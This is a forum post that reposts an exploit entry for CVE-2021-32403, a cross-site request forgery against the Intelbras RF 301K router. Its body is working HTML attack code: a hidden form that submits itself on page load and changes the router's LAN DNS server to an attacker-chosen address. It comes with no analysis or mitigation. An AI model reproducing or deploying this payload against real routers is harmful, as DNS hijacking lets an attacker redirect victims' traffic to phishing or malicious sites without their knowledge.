This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF) # Date: 01/05/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware 1.1.2-1.1.5 # CVE: 2021-32403 # Exploit Code: <html> <form action="http://10.0.0.1/goform/setSysTools" method="POST"> <input name="module3" value="lanCfg" type="hidden"> <input name="lanIP" value="10.0.0.1" type="hidden"> <input name="lanMask" value="255.255.255.0" type="hidden"> <input name="dhcpEn" value="true" type="hidden"> <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden"> <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden"> <input name="lanDns1" value="192.168.0.30" type="hidden"> <input name="lanDns2" value="" type="hidden"> </form> <script> document.forms[0].submit(); </script> </html> Link to comment Share on other sites More sharing options...
Recommended Posts